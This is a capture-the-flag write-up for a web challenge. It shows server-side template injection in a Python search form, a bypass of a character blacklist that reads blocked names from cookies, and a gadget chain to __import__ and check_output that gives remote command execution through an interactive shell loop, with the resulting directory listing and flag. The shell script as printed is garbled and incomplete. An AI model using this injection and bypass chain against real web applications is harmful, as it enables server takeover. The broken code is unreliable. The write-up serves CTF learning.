Tags: web template-injection python

Rating: 4.0

# http-for-pros (web, 200p, 43 solved)

## Description


You have all the hints you need... Get the flag!

Flag format: CTF{sha256}


In the task we get a webpage with some search form.

It seems the form either echos our input, or in some cases sends back some WAF-like error that certain character was blacklisted.
It took us a while to notice that there is a template injection issue.
If we send {{3*3}} we get back 9.

## Template injection

Now also the whole blacklist makes sense!
We need to bypass the blacklist and get RCE.

One of more problematic blocks is _ and also __class__.

But there are some tricks we can use, for example we can use request.args to access GET parameters, and we can use [] instead of . so for example request[request.args.x] would do request.__class__ of GET parameter x=__class__.

It so happens that GET parameters were also subjected to blacklist.

So following the same idea, we can do request[request.cookies['a']], set cookie a=__class__ and we confirm it works.

Now we just need some decent gadget chain from request.
First one we found was request._get_file_stream.im_func.func_globals['__builtins__']['__import__'], so we can craft it:

python
while True:
cmd = raw_input("sh> ")
params = {
}
"a": "__class__",
"b": "_get_file_stream",
"c": "im_func",
"d": "func_globals",
"e": "__builtins__",
"f": "__import__",
"g": "check_output",
"h": cmd
}
print(r.text)


And we get a nice shell.
From this we can just do ls -la and then cat flag to get:


sh> ls -la
total 32
drwxr-xr-x 1 root root 4096 Dec 1 08:56 .
drwxr-xr-x 1 root root 4096 Dec 1 08:56 ..
-rw-r--r-- 1 dctf dctf 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dctf dctf 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 dctf dctf 655 Jul 12 2019 .profile
-rwxr-xr-x 1 root root 2699 Dec 1 08:55 app.py
-rwxr-xr-x 1 root root 69 Dec 1 08:55 flag
drwxr-xr-x 1 root root 4096 Dec 1 08:55 templates

sh> cat flag
CTF{75df3454a132fcdd37d94882e343c6a23e961ed70f8dd88195345aa874c63e63}


Original writeup (https://github.com/TFNS/writeups/tree/master/2020-12-05-DefCampCTF/pros).